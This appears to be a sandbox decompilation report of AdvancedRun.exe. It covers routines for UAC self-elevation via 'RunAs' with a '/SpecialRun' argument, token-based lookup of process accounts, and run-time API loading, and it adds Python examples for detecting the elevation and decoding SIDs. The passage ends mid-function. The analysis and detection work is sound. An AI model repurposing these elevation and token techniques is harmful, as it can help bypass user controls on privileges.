                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 87%
                                                                   			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {   // writes a translation template: _a4 = module whose resources are walked, _a8 = output file name
                                                                   				void _v530;
                                                                   				char _v532;
                                                                   				void _v1042;
                                                                   				long _v1044;
                                                                   				long _v4116;
                                                                   				char _v5164;
                                                                   				void* __edi;
                                                                   				void* _t27;
                                                                   				void* _t38;
                                                                   				void* _t44;
                                                                   
                                                                   				E0040B550(0x142c, __ecx);                          // stack probe for the 0x142c (5164) byte frame
                                                                   				_v1044 = 0;                                        // version string buffer
                                                                   				memset( &_v1042, 0, 0x1fc);
                                                                   				_v532 = 0;                                         // own module path
                                                                   				memset( &_v530, 0, 0x208);
                                                                   				E00404AD9( &_v532);                                // subcall: GetModuleFileNameW(NULL, ...) -> path of this executable
                                                                   				_pop(_t44);
                                                                   				E00405AA7( &_v5164);
                                                                   				_t27 = E0040B04D( &_v5164,  &_v532);               // subcall: GetFileVersionInfoW / VerQueryValueW on the own image
                                                                   				_t61 = _t27;
                                                                   				if(_t27 != 0) {
                                                                   					wcscpy( &_v1044,  &_v4116);                    // version string available: keep it
                                                                   					_pop(_t44);
                                                                   				}
                                                                   				wcscpy(0x40fb90, _a8);                             // global: output file name
                                                                   				wcscpy(0x40fda0, L"general");                      // global: current section name
                                                                   				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);   // key=value entries of the "general" section; 0x40c4e8 is a global string constant
                                                                   				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
                                                                   				E00405FAC(_t61, L"Version",  &_v1044, 1);
                                                                   				E00405FAC(_t61, L"RTL", "0", 0);
                                                                   				EnumResourceNamesW(_a4, 4, E0040620E, 0);          // 4 = RT_MENU, callback E0040620E
                                                                   				EnumResourceNamesW(_a4, 5, E0040620E, 0);          // 5 = RT_DIALOG
                                                                   				wcscpy(0x40fda0, L"strings");                      // switch to the "strings" section
                                                                   				_t38 = E00406337(_t44, _t61, _a4);                 // fills the "strings" section from module _a4
                                                                   				 *0x40fb90 =  *0x40fb90 & 0x00000000;              // clear the output file name global
                                                                   				return _t38;
                                                                   			}
                                                                   Statement addresses (one per C statement above, in order): 0x00406466, 0x0040647d, 0x00406484, 0x00406499, 0x004064a0, 0x004064af, 0x004064b4, 0x004064bb, 0x004064cd, 0x004064d2, 0x004064d4, 0x004064e4, 0x004064ea, 0x004064ea, 0x004064f3, 0x00406503, 0x00406514, 0x00406525, 0x0040653b, 0x0040654e, 0x00406568, 0x00406572, 0x0040657a, 0x00406582, 0x0040658a, 0x00406596

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00406484
                                                                  • memset.MSVCRT ref: 004064A0
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                    • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                    • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                    • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                    • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                    • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                  • wcscpy.MSVCRT ref: 004064E4
                                                                  • wcscpy.MSVCRT ref: 004064F3
                                                                  • wcscpy.MSVCRT ref: 00406503
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                  • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                  • wcscpy.MSVCRT ref: 0040657A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                  • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                  • API String ID: 3037099051-2314623505
                                                                  • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                  • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                  • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                   			E00401C26(long _a4) {                                  // re-launches its own image elevated via ShellExecuteExW("RunAs"); _a4 is passed on as the %I64x argument
                                                                   				struct _SHELLEXECUTEINFOW _v68;
                                                                   				void _v582;
                                                                   				char _v584;
                                                                   				void _v1110;
                                                                   				char _v1112;
                                                                   				long _t23;
                                                                   				int _t36;
                                                                   				void* _t43;
                                                                   				long _t44;
                                                                   
                                                                   				_t44 = 0;                                          // return value, 0 = success
                                                                   				_t23 = GetCurrentProcessId();                      // caller pid, handed to the elevated child
                                                                   				_v584 = 0;                                         // parameter string
                                                                   				memset( &_v582, 0, 0x1fe);
                                                                   				_v1112 = 0;                                        // own module path
                                                                   				memset( &_v1110, 0, 0x208);
                                                                   				E00404AD9( &_v1112);                               // subcall: GetModuleFileNameW(NULL, ...) -> path of this executable
                                                                   				_push(_t23);                                       // %d   = caller pid
                                                                   				_push(0);                                          // high DWORD of the %I64x value
                                                                   				_push(_a4);                                        // low DWORD of the %I64x value
                                                                   				_push(L"/SpecialRun %I64x %d");
                                                                   				_push(0xff);
                                                                   				_push( &_v584);
                                                                   				L0040B1EC();                                       // _snwprintf (ref 00401C8F): builds "/SpecialRun <value> <pid>"
                                                                   				memset( &(_v68.fMask), 0, 0x38);                   // zero everything after cbSize
                                                                   				_v68.lpFile =  &_v1112;                            // own image
                                                                   				_v68.lpParameters =  &_v584;                       // "/SpecialRun <value> <pid>"
                                                                   				_v68.cbSize = 0x3c;                                // sizeof(SHELLEXECUTEINFOW) on x86
                                                                   				_v68.lpVerb = L"RunAs";                            // requests elevation: UAC consent prompt
                                                                   				_v68.fMask = 0x40;                                 // SEE_MASK_NOCLOSEPROCESS: hProcess stays valid
                                                                   				_v68.nShow = 5;                                    // SW_SHOW
                                                                   				_t36 = ShellExecuteExW( &_v68);
                                                                   				_t43 = _v68.hProcess;
                                                                   				if(_t36 == 0) {
                                                                   					_t44 = GetLastError();                         // e.g. ERROR_CANCELLED (1223) when the prompt is declined
                                                                   				} else {
                                                                   					WaitForSingleObject(_t43, 0x5dc);              // wait up to 1500 ms for the elevated child
                                                                   					_a4 = 0;
                                                                   					if(GetExitCodeProcess(_t43,  &_a4) != 0 && _a4 != 0x103) {   // 0x103 = STILL_ACTIVE counts as success
                                                                   						_t44 = _a4;                                // child already exited: propagate its exit code
                                                                   					}
                                                                   				}
                                                                   				return _t44;
                                                                   			}
                                                                   Statement addresses (one per C statement above, in order): 0x00401c31, 0x00401c33, 0x00401c48, 0x00401c4f, 0x00401c61, 0x00401c68, 0x00401c74, 0x00401c79, 0x00401c7a, 0x00401c7b, 0x00401c84, 0x00401c89, 0x00401c8e, 0x00401c8f, 0x00401c9b, 0x00401ca6, 0x00401caf, 0x00401cb9, 0x00401cc0, 0x00401cc7, 0x00401cce, 0x00401cd5, 0x00401cdd, 0x00401ce0, 0x00401d14, 0x00401ce2, 0x00401ce8, 0x00401cf3, 0x00401cfe, 0x00401d09, 0x00401d09, 0x00401cfe, 0x00401d1b

                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32(004101D8,?), ref: 00401C33
                                                                  • memset.MSVCRT ref: 00401C4F
                                                                  • memset.MSVCRT ref: 00401C68
                                                                    • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                  • _snwprintf.MSVCRT ref: 00401C8F
                                                                  • memset.MSVCRT ref: 00401C9B
                                                                  • ShellExecuteExW.SHELL32(?), ref: 00401CD5
                                                                  • WaitForSingleObject.KERNEL32(?,000005DC), ref: 00401CE8
                                                                  • GetExitCodeProcess.KERNEL32 ref: 00401CF6
                                                                  • GetLastError.KERNEL32 ref: 00401D0E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                   • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                   • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Process$CodeCurrentErrorExecuteExitFileLastModuleNameObjectShellSingleWait_snwprintf
                                                                  • String ID: /SpecialRun %I64x %d$<$@$RunAs
                                                                  • API String ID: 903100921-3385179869
                                                                  • Opcode ID: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction ID: 2715f163b7cd274c39606e2610d12bc00880993b2534c3bb77a56ee1366ffd0d
                                                                  • Opcode Fuzzy Hash: b1512c014bb39f996462de76d08949c278b93179518c0e0ab6201644cc20f86b
                                                                  • Instruction Fuzzy Hash: FD216D71900118FBDB20DB91CD48ADF7BBCEF44744F004176F608B6291D778AA84CBA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
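A hunting check built from the E00401C26 routine, added here as an example; it is not part of the Joe Sandbox report or of AdvancedRun itself. The routine leaves three observable traces in process-creation telemetry: the elevated child runs the same image as its caller, it is started with the RunAs verb, and its command line carries "/SpecialRun <64-bit hex> <pid>" where the pid is the caller's GetCurrentProcessId(). The events below are constructed Sysmon-style records (assumed field names ProcessId, ParentProcessId, Image, ParentImage, CommandLine, IntegrityLevel); the pid-to-parent cross-check assumes the telemetry attributes the UAC-elevated child to the requesting process.

```python
"""Hunt for AdvancedRun-style self-elevation in process-creation telemetry.

Added example, not code from the report or from the tool it analyses.
"""
import re
from typing import Dict, List, Optional

# "/SpecialRun %I64x %d": a 64-bit hex value, then the caller's pid.
SPECIALRUN_RE = re.compile(r"/SpecialRun\s+([0-9A-Fa-f]{1,16})\s+(\d{1,10})(?=\s|$)")

# Constructed Sysmon-style events (assumed field names), not taken from the report.
# Event 2 is the elevated re-launch: same image, "/SpecialRun" marker carrying the
# parent's pid, and a jump from Medium to High integrity. Event 3 carries the
# marker only and should score low.
SAMPLE_EVENTS: List[Dict] = [
    {"ProcessId": 3312, "ParentProcessId": 2104, "IntegrityLevel": "Medium",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AdvancedRun.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\AdvancedRun.exe"'},
    {"ProcessId": 4120, "ParentProcessId": 3312, "IntegrityLevel": "High",
     "Image": r"C:\Users\alice\AppData\Local\Temp\AdvancedRun.exe",
     "ParentImage": r"C:\Users\alice\AppData\Local\Temp\AdvancedRun.exe",
     "CommandLine": r'"C:\Users\alice\AppData\Local\Temp\AdvancedRun.exe" /SpecialRun 1a2b3c4d 3312'},
    {"ProcessId": 5000, "ParentProcessId": 777, "IntegrityLevel": "Medium",
     "Image": r"C:\Tools\other.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"other.exe /SpecialRun deadbeef 999"},
]


def parse_specialrun(cmdline: str) -> Optional[Dict[str, int]]:
    """Return the 64-bit value and caller pid from a '/SpecialRun <hex> <pid>' marker."""
    m = SPECIALRUN_RE.search(cmdline)
    if m is None:
        return None
    return {"value": int(m.group(1), 16), "caller_pid": int(m.group(2))}


def find_self_elevations(events: List[Dict]) -> List[Dict]:
    """Score every event carrying the marker by how many of the routine's traces it shows."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    hits = []
    for ev in events:
        marker = parse_specialrun(ev["CommandLine"])
        if marker is None:
            continue
        reasons = ["command line carries the /SpecialRun marker"]
        if ev["Image"].lower() == ev["ParentImage"].lower():
            reasons.append("child image equals parent image (self re-launch)")
        if marker["caller_pid"] == ev["ParentProcessId"]:
            reasons.append("pid embedded in the marker is the parent pid")
        parent = by_pid.get(ev["ParentProcessId"])
        if parent is not None and parent["IntegrityLevel"] != "High" and ev["IntegrityLevel"] == "High":
            reasons.append(f"integrity rose from {parent['IntegrityLevel']} to High")
        hits.append({"pid": ev["ProcessId"], "score": len(reasons), "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in find_self_elevations(SAMPLE_EVENTS):
        print(hit["pid"], hit["score"], "; ".join(hit["reasons"]))
```

If the user declines the UAC prompt, ShellExecuteExW fails, the routine returns GetLastError and no child is created, so this check only fires on elevations that succeeded.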

                                                                  C-Code - Quality: 44%
                                                                   			E00409A94(long _a4, intOrPtr _a8) {                    // resolves the account a process runs as: _a4 = target pid, _a8 = out buffer (0xff wchar) receiving "DOMAIN\user"
                                                                   				int _v8;
                                                                   				int _v12;
                                                                   				int _v16;
                                                                   				void* _v20;
                                                                   				void* _v24;
                                                                   				char _v28;
                                                                   				intOrPtr _v32;
                                                                   				char _v36;
                                                                   				char _v44;
                                                                   				char _v52;
                                                                   				char _v60;
                                                                   				void _v315;
                                                                   				char _v316;
                                                                   				void _v826;
                                                                   				char _v828;
                                                                   				void _v1338;
                                                                   				char _v1340;
                                                                   				void* __esi;
                                                                   				void* _t61;
                                                                   				_Unknown_base(*)()* _t93;
                                                                   				void* _t94;
                                                                   				int _t106;
                                                                   				void* _t108;
                                                                   				void* _t110;
                                                                   
                                                                   				_v828 = 0;                                         // account name buffer
                                                                   				memset( &_v826, 0, 0x1fe);
                                                                   				_v1340 = 0;                                        // domain name buffer
                                                                   				memset( &_v1338, 0, 0x1fe);
                                                                   				_t110 = _t108 + 0x18;
                                                                   				_t61 = OpenProcess(0x400, 0, _a4);                 // 0x400 = PROCESS_QUERY_INFORMATION
                                                                   				_t113 = _t61;
                                                                   				_v20 = _t61;
                                                                   				if(_t61 == 0) {
                                                                   					L11:
                                                                   					if(_v828 == 0) {                               // nothing resolved
                                                                   						__eflags = 0;
                                                                   						return 0;
                                                                   					}
                                                                   					_push( &_v828);                                // user
                                                                   					_push( &_v1340);                               // domain
                                                                   					_push(L"%s\\%s");
                                                                   					_push(0xff);
                                                                   					_push(_a8);
                                                                   					L0040B1EC();                                   // _snwprintf(_a8, 0xff, L"%s\\%s", domain, user)
                                                                   					return 1;
                                                                   				}
                                                                   				_v8 = 0;                                           // handle of the dynamically loaded DLL (freed at L9)
                                                                   				_v24 = 0;                                          // token handle
                                                                   				E00408F92( &_v8, _t113, _t61, 8,  &_v24);          // opens the process token into _v24 (8 = TOKEN_QUERY)
                                                                   				_t106 = _v24;
                                                                   				if(_t106 == 0) {
                                                                   					// fallback when no token could be opened: obtain the SID for pid _a4 by another route
                                                                   					_t32 =  &_v20; // 0x4059ec
                                                                   					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
                                                                   					_v316 = 0;
                                                                   					memset( &_v315, 0, 0xfe);
                                                                   					_t110 = _t110 + 0x20;
                                                                   					_v16 = 0xff;
                                                                   					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
                                                                   					if(__eflags == 0) {
                                                                   						L9:                                        // common cleanup
                                                                   						CloseHandle(_v20);
                                                                   						if(_v8 != 0) {
                                                                   							FreeLibrary(_v8);
                                                                   						}
                                                                   						goto L11;
                                                                   					}
                                                                   					_push( &_v28);                                 // SID_NAME_USE out
                                                                   					_push( &_a4);                                  // domain buffer size
                                                                   					_push( &_v1340);                               // domain
                                                                   					_push( &_v12);                                 // name buffer size
                                                                   					_push( &_v828);                                // name
                                                                   					_a4 = 0xff;
                                                                   					_push( &_v316);                                // on this path _v316 holds the SID itself
                                                                   					L8:
                                                                   					_v12 = 0xff;
                                                                   					E0040906D( &_v8, _t117);                       // SID -> account and domain name (argument shape of LookupAccountSidW)
                                                                   					goto L9;
                                                                   				}
                                                                   				_v316 = 0;                                         // TOKEN_USER buffer
                                                                   				memset( &_v315, 0, 0xff);
                                                                   				_v12 = _t106;                                      // token handle
                                                                   				_t110 = _t110 + 0xc;
                                                                   				_a4 = 0;                                           // ReturnLength
                                                                   				if(E00408F72( &_v8) == 0) {                        // loads the DLL exporting GetTokenInformation
                                                                   					goto L9;
                                                                   				}
                                                                   				_t93 = GetProcAddress(_v8, "GetTokenInformation");   // resolved at run time instead of being imported
                                                                   				if(_t93 == 0) {
                                                                   					goto L9;
                                                                   				}
                                                                   				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);     // GetTokenInformation(hToken, TokenUser = 1, buf, 0xff, &ReturnLength)
                                                                   				_t117 = _t94;
                                                                   				if(_t94 == 0) {
                                                                   					goto L9;
                                                                   				}
                                                                   				_push( &_v28);                                     // SID_NAME_USE out
                                                                   				_push( &_v12);                                     // domain buffer size
                                                                   				_push( &_v1340);                                   // domain
                                                                   				_push( &_v16);                                     // name buffer size
                                                                   				_push( &_v828);                                    // name
                                                                   				_push(_v316);                                      // first DWORD of TOKEN_USER = PSID
                                                                   				_v16 = 0xff;
                                                                   				goto L8;
                                                                   			}
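The routine above hands the first DWORD of the TOKEN_USER buffer (the Sid pointer of its SID_AND_ATTRIBUTES) to a name lookup and formats the result as DOMAIN\user. When that buffer is captured instead, from a debugger, a memory dump or an API hook, the SID has to be decoded by hand. The following is an added example and not code from the report or from AdvancedRun; the 32-bit TOKEN_USER sample, the stack address it is assumed to have been read from and the domain SID values are all constructed.

```python
"""Decode the TOKEN_USER buffer filled by GetTokenInformation(TokenUser).

Added example, not code from the report or from the tool it analyses.
"""
import struct
from typing import Dict, List

SID_MAX_SUB_AUTHORITIES = 15

# TokenUser SIDs worth flagging when the target process turns out to run as them.
WELL_KNOWN = {
    "S-1-5-18": "NT AUTHORITY\\SYSTEM",
    "S-1-5-19": "NT AUTHORITY\\LOCAL SERVICE",
    "S-1-5-20": "NT AUTHORITY\\NETWORK SERVICE",
}


def parse_sid(raw: bytes, offset: int = 0) -> str:
    """Binary SID -> 'S-1-<authority>-<sub>...'.

    Layout of the Windows SID structure: Revision (1 byte), SubAuthorityCount
    (1 byte), IdentifierAuthority (6 bytes, big-endian), then SubAuthorityCount
    little-endian DWORDs. Lengths are validated before every read so a short
    or corrupted capture raises instead of being mis-parsed.
    """
    if len(raw) - offset < 8:
        raise ValueError("SID shorter than its 8-byte header")
    revision, count = raw[offset], raw[offset + 1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if count > SID_MAX_SUB_AUTHORITIES:
        raise ValueError(f"SubAuthorityCount {count} exceeds SID_MAX_SUB_AUTHORITIES")
    end = offset + 8 + 4 * count
    if len(raw) < end:
        raise ValueError("SID truncated: fewer sub-authorities than declared")
    authority = int.from_bytes(raw[offset + 2:offset + 8], "big")
    subs = struct.unpack_from(f"<{count}I", raw, offset + 8)
    return "S-1-" + "-".join(str(x) for x in (authority, *subs))


def build_sid(authority: int, subs: List[int]) -> bytes:
    """Inverse of parse_sid; used here only to construct sample data."""
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack(f"<{len(subs)}I", *subs)


def sid_from_token_user(buf: bytes, base: int, ptr_size: int = 4) -> str:
    """Resolve the Sid pointer of a captured TOKEN_USER buffer.

    TOKEN_USER is one SID_AND_ATTRIBUTES {PSID Sid; DWORD Attributes}. The
    decompiled code reads the first DWORD as an absolute pointer; offline it is
    mapped back into the capture with the address the buffer was read from
    (base). GetTokenInformation stores the SID bytes in the same buffer right
    after the header, so the pointer lands inside the capture.
    """
    if len(buf) < ptr_size + 4:
        raise ValueError("buffer shorter than SID_AND_ATTRIBUTES")
    ptr = int.from_bytes(buf[:ptr_size], "little")
    off = ptr - base
    if off < 0 or off >= len(buf):
        raise ValueError("Sid pointer does not point into the captured buffer")
    return parse_sid(buf, off)


def describe(sid: str) -> Dict[str, object]:
    """Flag well-known service accounts and the built-in Administrator (RID 500 in a domain/machine SID)."""
    parts = sid.split("-")
    rid = int(parts[-1]) if len(parts) > 3 else None
    return {
        "sid": sid,
        "well_known": WELL_KNOWN.get(sid),
        "builtin_administrator": sid.startswith("S-1-5-21-") and rid == 500,
    }


# Constructed sample: a 32-bit TOKEN_USER as it would sit in the 0xff-byte stack
# buffer, assumed to have been read from address 0x0019F0C0. Domain values are made up.
BASE = 0x0019F0C0
SAMPLE_SID = build_sid(5, [21, 1004336348, 1177238915, 682003330, 500])
SAMPLE_TOKEN_USER = struct.pack("<II", BASE + 8, 0) + SAMPLE_SID
# Hand-encoded S-1-5-18 (SYSTEM): revision 1, one sub-authority, authority 5, sub-authority 0x12.
SYSTEM_SID_BYTES = bytes.fromhex("01 01 00 00 00 00 00 05 12 00 00 00")

if __name__ == "__main__":
    sid = sid_from_token_user(SAMPLE_TOKEN_USER, BASE)
    print(sid, describe(sid))
    print(parse_sid(SYSTEM_SID_BYTES), describe(parse_sid(SYSTEM_SID_BYTES)))
```

For a 64-bit capture pass ptr_size=8; the SID layout itself is the same on both architectures, only the SID_AND_ATTRIBUTES header grows to 16 bytes.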

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409AB7
                                                                  • memset.MSVCRT ref: 00409ACF
                                                                  • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                  • _snwprintf.MSVCRT ref: 00409C5A
                                                                    • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                  • memset.MSVCRT ref: 00409B25
                                                                  • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                  • memset.MSVCRT ref: 00409BC7
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                  • String ID: %s\%s$GetTokenInformation$Y@
                                                                  • API String ID: 3504373036-27875219
                                                                  • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                  • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                  • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E00409172() {
                                                                  				void* _t1;
                                                                  				int _t2;
                                                                  				struct HINSTANCE__* _t5;
                                                                  
                                                                  				if( *0x4101bc != 0) {
                                                                  					return _t1;
                                                                  				}
                                                                  				_t2 = E00405436(L"psapi.dll");
                                                                  				_t5 = _t2;
                                                                  				if(_t5 == 0) {
                                                                  					L10:
                                                                  					return _t2;
                                                                  				} else {
                                                                  					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
                                                                  					 *0x40f848 = _t2;
                                                                  					if(_t2 != 0) {
                                                                  						_t2 = GetProcAddress(_t5, "EnumProcessModules");
                                                                  						 *0x40f840 = _t2;
                                                                  						if(_t2 != 0) {
                                                                  							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
                                                                  							 *0x40f838 = _t2;
                                                                  							if(_t2 != 0) {
                                                                  								_t2 = GetProcAddress(_t5, "EnumProcesses");
                                                                  								 *0x40fa6c = _t2;
                                                                  								if(_t2 != 0) {
                                                                  									_t2 = GetProcAddress(_t5, "GetModuleInformation");
                                                                  									 *0x40f844 = _t2;
                                                                  									if(_t2 != 0) {
                                                                  										 *0x4101bc = 1;
                                                                  									}
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  					if( *0x4101bc == 0) {
                                                                  						_t2 = FreeLibrary(_t5);
                                                                  					}
                                                                  					goto L10;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 004091C0
                                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004091D1
                                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004091E2
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00409202
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$Library$Load$Freememsetwcscat
                                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                  • API String ID: 1182944575-70141382
                                                                  • Opcode ID: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction ID: e8d56a808bd010e6a3fef0dff4ae07571f85a6d4972d2e5c8a67e4e39b9e152a
                                                                  • Opcode Fuzzy Hash: d87044beb2f544c687dd7353a18839beb98a5be9ca02ea53753111702b61b9a8
                                                                  • Instruction Fuzzy Hash: 33017175A41207BAD7205B656D88FB739E49B91B51B14413FE404F12D2DB7C88459F2C
                                                                  Uniqueness
                                                                  • Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E004090EE() {
                                                                  				void* _t1;
                                                                  				_Unknown_base(*)()* _t2;
                                                                  				struct HINSTANCE__* _t4;
                                                                  
                                                                  				if( *0x4101b8 != 0) {
                                                                  					return _t1;
                                                                  				}
                                                                  				_t2 = GetModuleHandleW(L"kernel32.dll");
                                                                  				_t4 = _t2;
                                                                  				if(_t4 == 0) {
                                                                  					L9:
                                                                  					return _t2;
                                                                  				}
                                                                  				_t2 = GetProcAddress(_t4, "CreateToolhelp32Snapshot");
                                                                  				 *0x40f83c = _t2;
                                                                  				if(_t2 != 0) {
                                                                  					_t2 = GetProcAddress(_t4, "Module32First");
                                                                  					 *0x40f834 = _t2;
                                                                  					if(_t2 != 0) {
                                                                  						_t2 = GetProcAddress(_t4, "Module32Next");
                                                                  						 *0x40f830 = _t2;
                                                                  						if(_t2 != 0) {
                                                                  							_t2 = GetProcAddress(_t4, "Process32First");
                                                                  							 *0x40f5c4 = _t2;
                                                                  							if(_t2 != 0) {
                                                                  								_t2 = GetProcAddress(_t4, "Process32Next");
                                                                  								 *0x40f828 = _t2;
                                                                  								if(_t2 != 0) {
                                                                  									 *0x4101b8 = 1;
                                                                  								}
